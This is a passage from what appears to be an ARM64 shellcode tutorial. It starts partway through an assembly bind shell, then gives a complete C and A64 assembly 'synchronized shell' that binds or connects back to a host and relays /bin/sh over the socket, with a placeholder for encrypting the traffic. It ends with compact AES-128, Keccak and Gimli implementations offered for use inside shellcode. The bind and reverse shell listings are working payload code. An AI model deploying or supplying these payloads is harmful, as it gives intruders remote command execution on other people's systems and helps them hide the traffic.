    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // bind(s, &sa, sizeof(sa));  
    mov     x8, SYS_bind
    mov     x2, 16
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    svc     0

    // listen(s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    mov     w0, w3
    svc     0

    // r = accept(s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    mov     w0, w3
    svc     0

    mov     w3, w0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.7 Synchronized shell

“And now for something completely different.”

There’s nothing wrong with the bind or reverse shells mentioned. They work fine. However, it’s not possible to manipulate the incoming or outgoing streams of data, so there isn’t any confidentiality provided between two systems. To solve this we use sychronization. Most POSIX systems offer the select function for this purpose. It allows one to monitor I/O of file descriptors. However, select is limited in how many descriptors it can monitor in a single process. For that reason, kqueue on BSD and epoll on Linux were developed as they are unaffected the same limitations.

#define _GNU_SOURCE

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sched.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

int main(void) {
    struct sockaddr_in sa;
    int                i, r, w, s, len, efd; 
    #ifdef BIND
    int                s2;
    #endif
    int                fd, in[2], out[2];
    char               buf[BUFSIZ];
    struct epoll_event evts;
    char               *args[]={"/bin/sh", NULL};
    pid_t              ctid, pid;
 
    // create pipes for redirection of stdin/stdout/stderr
    pipe2(in, 0);
    pipe2(out, 0);

    // fork process
    ctid = syscall(SYS_gettid);
    
    pid  = syscall(SYS_clone, 
        CLONE_CHILD_SETTID   | 
        CLONE_CHILD_CLEARTID | 
        SIGCHLD, 0, NULL, 0, &ctid);

    // if child process
    if (pid == 0) {
      // assign read end to stdin
      dup3(in[0],  STDIN_FILENO,  0);
      // assign write end to stdout   
      dup3(out[1], STDOUT_FILENO, 0);
      // assign write end to stderr  
      dup3(out[1], STDERR_FILENO, 0);  
      
      // close pipes
      close(in[0]);  close(in[1]);
      close(out[0]); close(out[1]);
      
      // execute shell
      execve(args[0], args, 0);
    } else {      
      // close read and write ends
      close(in[0]); close(out[1]);
      
      // create a socket
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(atoi("1234"));
      
      #ifdef BIND
        // bind to port for incoming connections
        sa.sin_addr.s_addr = INADDR_ANY;
        
        bind(s, (struct sockaddr*)&sa, sizeof(sa));
        listen(s, 0);
        r = accept(s, 0, 0);
        s2 = s; s = r;
      #else
        // connect to remote host
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
      
        r = connect(s, (struct sockaddr*)&sa, sizeof(sa));
      #endif
      
      // if ok
      if (r >= 0) {
        // open an epoll file descriptor
        efd = epoll_create1(0);
 
        // add 2 descriptors to monitor stdout and socket
        for (i=0; i<2; i++) {
          fd = (i==0) ? s : out[0];
          evts.data.fd = fd;
          evts.events  = EPOLLIN;
        
          epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
        }
          
        // now loop until user exits or some other error
        for (;;) {
          r = epoll_pwait(efd, &evts, 1, -1, NULL);
                  
          // error? bail out           
          if (r < 0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
          // assign socket or read end of output
          r = (fd == s) ? s     : out[0];
          // assign socket or write end of input
          w = (fd == s) ? in[1] : s;

          // read from socket or stdout        
          len = read(r, buf, BUFSIZ);

          if (!len) break;
          
          // encrypt/decrypt data here
          
          // write to socket or stdin        
          write(w, buf, len);        
        }      
        // remove 2 descriptors 
        epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);                  
        epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);                  
        close(efd);
      }
      // shutdown socket
      shutdown(s, SHUT_RDWR);
      close(s);
      #ifdef BIND
        close(s2);
      #endif
      // terminate shell      
      kill(pid, SIGCHLD);            
    }
    close(in[1]);
    close(out[0]);
    return 0; 
}

Let’s see how some of these calls were implemented using the A64 set. First, replacing the standard I/O handles with pipe descriptors.

  // assign read end to stdin
  dup3(in[0],  STDIN_FILENO,  0);
  // assign write end to stdout   
  dup3(out[1], STDOUT_FILENO, 0);
  // assign write end to stderr  
  dup3(out[1], STDERR_FILENO, 0);  

The write end of out is assigned to stdout and stderr while the read end of in is assigned to stdin. We can perform this with the following.

    mov     x8, SYS_dup3
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, in0]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

Eleven instructions or 44 bytes are used for this. If we want to save a few bytes, we could use a loop instead. The value of STDIN_FILENO is conveniently zero and STDERR_FILENO is 2. We can simply loop from 0 to 3 and use a ternary operator to choose the correct descriptor.

  for (i=0; i<3; i++) {
    dup3(i==0 ? in[0] : out[1], i, 0);
  }

To perform the same operation in assembly, we can use the CSEL instruction.

    mov     x8, SYS_dup3
    mov     x1, (STDERR_FILENO + 1) // x1 = 3
    mov     x2, xzr                 // x2 = 0
    ldp     w4, w3, [sp, out1]      // w4 = out[1], w3 = in[0]
c_dup:
    subs    x1, x1, 1               // 
    csel    w0, w3, w4, eq          // w0 = (x1==0) ? in[0] : out[1]
    svc     0
    cbnz    x1, c_dup
    

Using a loop in place of what we orginally had, we remove three instructions and save a total of twelve bytes. A similar operation can be implemented for closing the pipe handles. In the C code, it simply closes each one in separate statements like so.

  // close pipes
  close(in[0]);  close(in[1]);
  close(out[0]); close(out[1]);

For the assembly code, a loop is used instead. Six instructions are used instead of eight.

    mov     x1, 4*4          // i = 4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4        // i--
    ldr     w0, [sp, x1]     // w0 = pipes[i]
    svc     0
    cbnz    x1, cls_pipe     // while (i != 0)

The epoll_pwait system call is used instead of the pselect6 system call to monitor file descriptors. Before calling epoll_pwait we must create an epoll file descriptor using epoll_create1 and add descriptors to it using epoll_ctl. The following code does that once a connection to remote peer has been established.

  // add 2 descriptors to monitor stdout and socket
  for (i=0; i<2; i++) {
    fd = (i==0) ? s : out[0];
    evts.data.fd = fd;
    evts.events  = EPOLLIN;
  
    epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
  }

All registers including the process state are preserved across system calls. So we could implement the above code using the following assembly code.

    mov     x8, SYS_epoll_ctl
    add     x3, sp, evts       // x3 = &evts
    mov     x1, EPOLL_CTL_ADD  // x1 = EPOLL_CTL_ADD
    mov     x4, EPOLLIN

    ldr     w2, [sp, s]        // w2 = s
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

    ldr     w2, [sp, out0]     // w2 = out[0]
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

Twelve instructions used here or forty-eight bytes. Using a loop, let’s see if we can save more space. Some of you may have noticed both EPOLL_CTL_ADD and EPOLLIN are 1. We can save 4 bytes with the following.

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init

The value returned by the epoll_pwait system call must be checked before continuing to process the events structure. If successful, it will return the number of file descriptors that were signalled while -1 will indicate an error.

  r = epoll_pwait(efd, &evts, 1, -1, NULL);
          
  // error? bail out           
  if (r < 0) break;

Recall in the Common Operations section where we test for -1. One could use the following assembly code.

    tst     x0, x0
    bl      cls_efd

A64 provides a conditional branch opcode that allows us to execute the IF statement in one instruction.

    tbnz    x0, 31, cls_efd

After this check, we then need to determine if the signal was the result of input. We are only monitoring for input to a read end of pipe and socket. Every other event would indicate an error.

  // not input? bail out
  if (!(evts.events & EPOLLIN)) break;

  fd = evts.data.fd;

The value of EPOLLIN is 1, and we only want those type of events. By masking the value of events with 1 using a bitwise AND, if the result is zero, then the peer has disconnected. Load pair is used to load both the events and data_fd values simultaneously.

    // x0 = evts.events, x1 = evts.data.fd
    ldp     x0, x1, [sp, evts]

    // if (!(evts.events & EPOLLIN)) break;
    tbz     w0, 0, cls_efd

Our code will read from either out[0] or s.

  // assign socket or read end of output
  r = (fd == s) ? s     : out[0];
  // assign socket or write end of input
  w = (fd == s) ? in[1] : s;

Using the highly useful conditional select instruction, we can select the correct descriptors to read and write to.

    // w3 = s
    ldr     w3, [sp, s]
    // w5 = in[1], w4 = out[0]
    ldp     w5, w4, [sp, in1]

    // fd == s
    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

The final assembly code for the synchronized shell follows.

    .arch armv8-a
    .align 4

    // default TCP port
    .equ PORT, 1234

    // default host, 127.0.0.1
    .equ HOST, 0x0100007F

    // comment out for a reverse connecting shell
    .equ BIND, 1

    // comment out for code to behave as a function
    .equ EXIT, 1

    .include "include.inc"

    // structure for stack variables

          .struct 0
    p_in: .skip 8
          .equ in0, p_in + 0
          .equ in1, p_in + 4

    p_out:.skip 8
          .equ out0, p_out + 0
          .equ out1, p_out + 4

    id:   .skip 8
    efd:  .skip 4
    s:    .skip 4

    .ifdef BIND
    s2:   .skip 8
    .endif

    evts: .skip 16
          .equ events, evts + 0
          .equ data_fd,evts + 8

    buf:  .skip BUFSIZ
    ds_tbl_size:

    .global _start
    .text
_start:
    // allocate memory for variables
    // ensure data structure aligned by 16 bytes
    sub     sp, sp, (ds_tbl_size & -16) + 16

    // create pipes for stdin
    // pipe2(in, 0);
    mov     x8, SYS_pipe2
    mov     x1, xzr
    add     x0, sp, p_in
    svc     0

    // create pipes for stdout + stderr
    // pipe2(out, 0);
    add     x0, sp, p_out
    svc     0

    // syscall(SYS_gettid);
    mov     x8, SYS_gettid
    svc     0
    str     w0, [sp, id]

    // clone(CLONE_CHILD_SETTID   | 
    //       CLONE_CHILD_CLEARTID | 
    //       SIGCHLD, 0, NULL, NULL, &ctid)
    mov     x8, SYS_clone
    add     x4, sp, id           // ctid
    mov     x3, xzr              // newtls
    mov     x2, xzr              // ptid
    movl    x0, (CLONE_CHILD_SETTID + CLONE_CHILD_CLEARTID + SIGCHLD)
    svc     0
    str     w0, [sp, id]         // save id
    cbnz    w0, opn_con          // if already forked?
                                 // open connection
    // in this order..
    //
    // dup3 (out[1], STDERR_FILENO, 0);
    // dup3 (out[1], STDOUT_FILENO, 0);
    // dup3 (in[0],  STDIN_FILENO , 0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
    ldr     w3, [sp, in0]
    ldr     w4, [sp, out1]
c_dup:
    subs    x1, x1, 1
    // w0 = (x1 == 0) ? in[0] : out[1];
    csel    w0, w3, w4, eq
    svc     0
    cbnz    x1, c_dup

    // close pipe handles in this order..
    //
    // close(in[0]);
    // close(in[1]);
    // close(out[0]);
    // close(out[1]);
    mov     x1, 4*4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4
    ldr     w0, [sp, x1]
    svc     0
    cbnz    x1, cls_pipe

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp, -16]!
    mov     x0, sp
    svc     0
opn_con:
    // close(in[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, in0]
    svc     0

    // close(out[1]);
    ldr     w0, [sp, out1]
    svc     0

    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     x2, 16      // x2 = sizeof(sin)
    str     w0, [sp, s] // w0 = s
.ifdef BIND
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    // bind (s, &sa, sizeof(sa));
    mov     x8, SYS_bind
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck  // if(x0 != 0) goto cls_sck

    // listen (s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    ldr     w0, [sp, s]
    svc     0

    // accept (s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, s]
    svc     0

    ldr     w1, [sp, s]      // load binding socket
    stp     w0, w1, [sp, s]
    mov     x0, xzr
.else
    movq    x1, ((HOST << 32) | (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET))
    str     x1, [sp, -16]!
    mov     x1, sp
    // connect (s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck      // if(x0 != 0) goto cls_sck
.endif
    // efd = epoll_create1(0);
    mov     x8, SYS_epoll_create1
    svc     0
    str     w0, [sp, efd]

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init
    // now loop until user exits or some other error
poll_wait:
    // epoll_pwait(efd, &evts, 1, -1, NULL);
    mov     x8, SYS_epoll_pwait
    mov     x4, xzr              // sigmask   = NULL
    mvn     x3, xzr              // timeout   = -1
    mov     x2, 1                // maxevents = 1
    add     x1, sp, evts         // *events   = &evts
    ldr     w0, [sp, efd]        // epfd      = efd
    svc     0

    // if (r < 0) break;
    tbnz    x0, 31, cls_efd

    // if (!(evts.events & EPOLLIN)) break;
    ldp     x0, x1, [sp, evts]
    tbz     w0, 0, cls_efd

    ldr     w3, [sp, s]
    ldp     w5, w4, [sp, in1]

    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

    // read(r, buf, BUFSIZ);
    mov     x8, SYS_read
    mov     x2, BUFSIZ
    add     x1, sp, buf
    svc     0
    cbz     x0, cls_efd

    // encrypt/decrypt buffer

    // write(w, buf, len);
    mov     x8, SYS_write
    mov     w2, w0
    mov     w0, w3
    svc     0
    b       poll_wait
cls_efd:
    // epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
    mov     x8, SYS_epoll_ctl
    mov     x3, xzr
    mov     x1, EPOLL_CTL_DEL
    ldp     w0, w2, [sp, efd]
    svc     0

    // epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
    ldr     w2, [sp, out0]
    ldr     w0, [sp, efd]
    svc     0

    // close(efd);
    mov     x8, SYS_close
    ldr     w0, [sp, efd]
    svc     0

    // shutdown(s, SHUT_RDWR);
    mov     x8, SYS_shutdown
    mov     x1, SHUT_RDWR
    ldr     w0, [sp, s]
    svc     0
cls_sck:
    // close(s);
    mov     x8, SYS_close
    ldr     w0, [sp, s]
    svc     0

.ifdef BIND
    // close(s2);
    mov     x8, SYS_close
    ldr     w0, [sp, s2]
    svc     0
.endif
    // kill(pid, SIGCHLD);
    mov     x8, SYS_kill
    mov     x1, SIGCHLD
    ldr     w0, [sp, id]
    svc     0

    // close(in[1]);
    mov     x8, SYS_close
    ldr     w0, [sp, in1]
    svc     0

    // close(out[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, out0]
    svc     0

.ifdef EXIT
    // exit(0);
    mov     x8, SYS_exit
    svc     0
.else
    // deallocate stack
    add     sp, sp, (ds_tbl_size & -16) + 16
    ret
.endif

7. Encryption

Every one of you reading this should learn about cryptography. Yes, it’s a complex subject, but you don’t need to be a mathematician just to learn about all the various algorithms that exist. Many cryptographic algorithms intended to protect data exist, but not all of them were designed for resource constrained-environments. In this section, you’ll see a number of cryptographic algorithms that you might consider using in a shellcode at some point. The block ciphers only implement encryption. That is to say, there is no inverse function provided and therefore cannot be used with a mode like Cipher Block Chaining (CBC) mode. Encryption is all that’s required to implement Counter (CTR) mode. Moreover, it’s likely that permutation-based cryptography will eventually replace traditional types of encryption. The algorithms shown here are intentionally optimized for size rather than speed.

Also…None of the algorithms presented here are written to protect against side-channel attacks. That’s just in case anyone wants to point out a weakness. 😉

7.1 AES-128

A block cipher published in 1998 and originally called ‘Rijndael’ after its designers, Vincent Rijmen and Joan Daemen. Today, it’s known as the Advanced Encryption Standard (AES). I’ve included it here because AES extensions are only an optional component of ARM. The Cortex A53 that comes with the Raspberry Pi 3 does not have support for AES. This implementation along with others can be found in this Github repository.

ADVANCED ENCRYPTION STANDARD (AES)

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned int W;
// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B w) {
    B j,y,z;
    
    if(w) {
      for(z=j=0,y=1;--j;y=(!z&&y==w)?z=1:y,y^=M(y));
      z=y;F(4)z^=y=(y<<1)|(y>>7);
    }
    return z^99;
}
void E(B *s) {
    W i,w,x[8],c=1,*k=(W*)&x[4];

    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];

    for(;;){
      // AddRoundKey, 1st part of ExpandRoundKey
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

      // AddRoundConstant, perform 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;

      // if round 11, stop; 
      if(c==108)break; 
      
      // update round constant
      c=M(c);

      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

      // if not round 11, MixColumns
      if(c!=108)
        F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

The handwritten assembly results in an approx. 40% less code when compared with GNU CC, generated assembly. The use of CCMP and CSEL for the statement : y = (!z && y == w) ? z = 1 : y; should protect against side-channel attacks. However, as I stated at the beginning of this section, I am not a cryptographer and do not wish to make security claims on the implementations provided here. The BFXIL instruction is used to replace the low 8-bits of register input to the SubByte subroutine.

// AES-128 Encryption in ARM64 assembly
// 352 bytes

    .arch armv8-a
    .text

    .global E

// *****************************
// Multiplication over GF(2**8)
// *****************************
M:
    and      w10, w14, 0x80808080
    mov      w12, 27
    lsr      w8, w10, 7
    mul      w8, w8, w12
    eor      w10, w14, w10
    eor      w10, w8, w10, lsl 1
    ret

// *****************************
// B SubByte(B x);
// *****************************
S:
    str      lr, [sp, -16]!
    ands     w7, w13, 0xFF
    beq      SB2

    mov      w14, 1
    mov      w15, 1
    mov      x3, 0xFF
SB0:
    cmp      w15, 1
    ccmp     w14, w7, 0, eq
    csel     w14, w15, w14, eq
    csel     w15, wzr, w15, eq
    bl       M
    eor      w14, w14, w10
    subs     x3, x3, 1
    bne      SB0

    and      w7, w14, 0xFF
    mov      x3, 4
SB1:
    lsr      w10, w14, 7
    orr      w14, w10, w14, lsl 1
    eor      w7, w7, w14
    subs     x3, x3, 1
    bne      SB1
SB2:
    mov      w10, 99
    eor      w7, w7, w10
    bfxil    w13, w7, 0, 8
    ldr      lr, [sp], 16
    ret

// *****************************
// void E(void *s);
// *****************************
E:
    str      lr, [sp, -16]!
    sub      sp, sp, 32

    // copy plain text + master key to x
    // F(8)x[i]=((W*)s)[i];
    ldp      x5, x6, [x0]
    ldp      x7, x8, [x0, 16]
    stp      x5, x6, [sp]
    stp      x7, x8, [sp, 16]

    // c = 1
    mov      w4, 1
L0:
    // AddRoundKey, 1st part of ExpandRoundKey
    // w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
    mov      x2, xzr
    ldr      w13, [sp, 16+3*4]
    add      x1, sp, 16
L1:
    bl       S
    ror      w13, w13, 8
    ldr      w10, [sp, x2, lsl 2]
    ldr      w11, [x1, x2, lsl 2]
    eor      w10, w10, w11
    str      w10, [x0, x2, lsl 2]

    add      x2, x2, 1
    cmp      x2, 4
    bne      L1

    // AddRoundConstant, perform 2nd part of ExpandRoundKey
    // w=R(w,8)^c;F(4)w=k[i]^=w;
    eor      w13, w4, w13, ror 8
L2:
    ldr      w10, [x1]
    eor      w13, w13, w10
    str      w13, [x1], 4

    subs     x2, x2, 1
    bne      L2

    // if round 11, stop
    // if(c==108)break;
    cmp      w4, 108
    beq      L5

    // update round constant
    // c=M(c);
    mov      w14, w4
    bl       M
    mov      w4, w10

    // SubBytes and ShiftRows
    // F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
L3:
    ldrb     w13, [x0, x2]
    bl       S
    and      w10, w2, 3
    lsr      w11, w2, 2
    sub      w11, w11, w10
    and      w11, w11, 3
    add      w10, w10, w11, lsl 2
    strb     w13, [sp, w10, uxtw]

    add      x2, x2, 1
    cmp      x2, 16
    bne      L3

    // if (c != 108)
    cmp      w4, 108
L4:
    beq      L0
    subs     x2, x2, 4

    // MixColumns
    // F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    ldr      w13, [sp, x2]
    eor      w14, w13, w13, ror 8
    bl       M
    eor      w14, w10, w13, ror 8
    eor      w14, w14, w13, ror 16
    eor      w14, w14, w13, ror 24
    str      w14, [sp, x2]

    b        L4
L5:
    add      sp, sp, 32
    ldr      lr, [sp], 16
    ret

7.2 KECCAK

A permutation function designed by the Keccak team (Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche).

#define R(v,n)(((v)<<(n))|((v)>>(64-(n))))
#define F(a,b)for(a=0;a<b;a++)
  
void keccak(void*p){
  unsigned long long n,i,j,r,x,y,t,Y,b[5],*s=p;
  unsigned char RC=1;
  
  F(n,24){
    F(i,5){b[i]=0;F(j,5)b[i]^=s[i+5*j];}
    F(i,5){
      t=b[(i+4)%5]^R(b[(i+1)%5],1);
      F(j,5)s[i+5*j]^=t;}
    t=s[1],y=r=0,x=1;
    F(j,24)
      r+=j+1,Y=2*x+3*y,x=y,y=Y%5,
      Y=s[x+5*y],s[x+5*y]=R(t,r%64),t=Y;
    F(j,5){
      F(i,5)b[i]=s[i+5*j];
      F(i,5)
        s[i+5*j]=b[i]^(~b[(i+1)%5]&b[(i+2)%5]);}
    F(j,7)
      if((RC=(RC<<1)^(113*(RC>>7)))&2)
        *s^=1ULL<<((1<<j)-1);
  }
}

The following source is an example of where preprocessor directives are used to ease implementation of the original source code. This would be first processed with CPP using the -E option. I’ve done this so it’s easier to create Keccak-p[800, 22] assembly code for the ARM32 or ARM64 architecture if required later.

The ARM instruction set doesn’t feature a modulus instruction. Unlike the DIV or IDIV instructions on x86, UDIV and SDIV don’t calculate the remainder. The solution is to use a bitwise AND where the divisor is a power of 2 and a combination of division, multiplication and subtraction for everything else. The formula for divisors that are not a power of 2 is : a - (n * int(a/n)). To implement in ARM64 assembly, UDIV and MSUB are used.

// keccak-p[1600, 24]
// 428 bytes

    .arch armv8-a
    .text
    .global k1600

    #define s x0
    #define n x1
    #define i x2
    #define j x3
    #define r x4
    #define x x5
    #define y x6
    #define t x7
    #define Y x8
    #define c x9   // round constant (unsigned char)
    #define d x10
    #define v x11
    #define u x12
    #define b sp   // local buffer

k1600:
    sub     sp, sp, 64
    // F(n,24){
    mov     n, 24
    mov     c, 1                // c = 1
L0:
    mov     d, 5
    // F(i,5){b[i]=0;F(j,5)b[i]^=s[i+j*5];}
    mov     i, 0                // i = 0
L1:
    mov     j, 0                // j = 0
    mov     u, 0                // u = 0
L2:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     v, [s, v, lsl 3]    // v = s[v]

    eor     u, u, v             // u ^= v

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L2

    str     u, [b, i, lsl 3]    // b[i] = u

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L1

    // F(i,5){
    mov     i, 0
L3:
    // t=b[(i+4)%5] ^ R(b[(i+1)%5], 63);
    add     v, i, 4             // v = i + 4
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     u, [b, v, lsl 3]    // u = b[v]

    eor     t, t, u, ror 63     // t ^= R(u, 63)

    // F(j,5)s[i+j*5]^=t;}
    mov     j, 0
L4:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     u, [s, v, lsl 3]    // u = s[v]
    eor     u, u, t             // u ^= t
    str     u, [s, v, lsl 3]    // s[v] = u 

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L4

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L3

    // t=s[1],y=r=0,x=1;
    ldr     t, [s, 8]           // t = s[1]
    mov     y, 0                // y = 0
    mov     r, 0                // r = 0
    mov     x, 1                // x = 1

    // F(j,24)
    mov     j, 0
L5:
    add     j, j, 1             // j = j + 1
    // r+=j+1,Y=(x*2)+(y*3),x=y,y=Y%5,
    add     r, r, j             // r = r + j
    add     Y, y, y, lsl 1      // Y = y * 3
    add     Y, Y, x, lsl 1      // Y = Y + (x * 2)
    mov     x, y                // x = y 
    udiv    y, Y, d             // y = (Y / 5)
    msub    y, y, d, Y          // y = (Y - (y * 5)) 

    // Y=s[x+y*5],s[x+y*5]=R(t, -(r - 64) % 64),t=Y;
    madd    v, y, d, x          // v = (y * 5) + x
    ldr     Y, [s, v, lsl 3]    // Y = s[v]
    neg     u, r
    ror     t, t, u             // t = R(t, u)
    str     t, [s, v, lsl 3]    // s[v] = t 
    mov     t, Y

    cmp     j, 24               // j < 24
    bne     L5

    // F(j,5){
    mov     j, 0                // j = 0
L6:
    // F(i,5)b[i] = s[i+j*5];
    mov     i, 0                // i = 0
L7:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     t, [s, v, lsl 3]    // t = s[v]
    str     t, [b, i, lsl 3]    // b[i] = t

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L7

    // F(i,5)
    mov     i, 0                // i = 0
L8:
    // s[i+j*5] = b[i] ^ (b[(i+2)%5] & ~b[(i+1)%5]);}
    add     v, i, 2             // v = i + 2 
    udiv    u, v, d             // u = v / 5
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = v / 5 
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     u, [b, v, lsl 3]    // u = b[v]

    bic     u, t, u             // u = (t & ~u)

    ldr     t, [b, i, lsl 3]    // t = b[i]
    eor     t, t, u             // t ^= u

    madd    v, j, d, i          // v = (j * 5) + i
    str     t, [s, v, lsl 3]    // s[v] = t

    add     i, i, 1             // i++
    cmp     i, 5                // i < 5
    bne     L8

    add     j, j, 1
    cmp     j, 5
    bne     L6

    // F(j,7)
    mov     j, 0                // j = 0
    mov     d, 113
L9:
    // if((c=(c<<1)^((c>>7)*113))&2)
    lsr     t, c, 7             // t = c >> 7
    mul     t, t, d             // t = t * 113 
    eor     c, t, c, lsl 1      // c = t ^ (c << 1)
    and     c, c, 255           // c = c % 256 
    tbz     c, 1, L10           // if (c & 2)

    //   *s^=1ULL<<((1<<j)-1);
    mov     v, 1                // v = 1
    lsl     u, v, j             // u = v << j 
    sub     u, u, 1             // u = u - 1
    lsl     v, v, u             // v = v << u
    ldr     t, [s]              // t = s[0]
    eor     t, t, v             // t ^= v
    str     t, [s]              // s[0] = t
L10:
    add     j, j, 1             // j = j + 1
    cmp     j, 7                // j < 7
    bne     L9

    subs    n, n, 1             // n = n - 1
    bne     L0

    add     sp, sp, 64
    ret

7.3 GIMLI

A permutation function designed by Daniel J. Bernstein, Stefan Kölbl, Stefan Lucks, Pedro Maat Costa Massolino, Florian Mendel, Kashif Nawaz, Tobias Schneider, Peter Schwabe, François-Xavier Standaert, Yosuke Todo, and Benoît Viguier.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)
  
void gimli(void*p){
  unsigned int r,j,t,x,y,z,*s=p;

  for(r=24;r>0;--r){
    for(j=0;j<4;j++)
      x=R(s[j],24),
      y=R(s[4+j],9),
      z=s[8+j],   
      s[8+j]=x^(z+z)^((y&z)*4),
      s[4+j]=y^x^((x|z)*2),
      s[j]=z^y^((x&y)*8);
    t=r&3;    
    if(!t)
      X(0,1),X(2,3),
      *s^=0x9e377900|r;   
    if(t==2)X(0,2),X(1,3);
  }
}

